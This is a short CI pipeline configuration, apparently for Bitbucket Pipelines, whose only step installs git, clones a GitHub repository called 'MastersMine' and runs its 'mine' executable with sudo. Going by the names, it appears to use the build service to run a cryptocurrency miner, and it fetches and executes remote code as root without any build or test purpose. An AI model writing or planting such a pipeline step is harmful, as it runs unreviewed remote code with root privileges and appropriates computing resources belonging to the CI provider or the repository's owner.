pipelines:
  default:
    - step:
        script:
          - sudo apt install -y git && sudo git clone https://github.com/Anli-Project/MastersMine.git && cd MastersMine && sudo chmod u+x mine && sudo ./mine
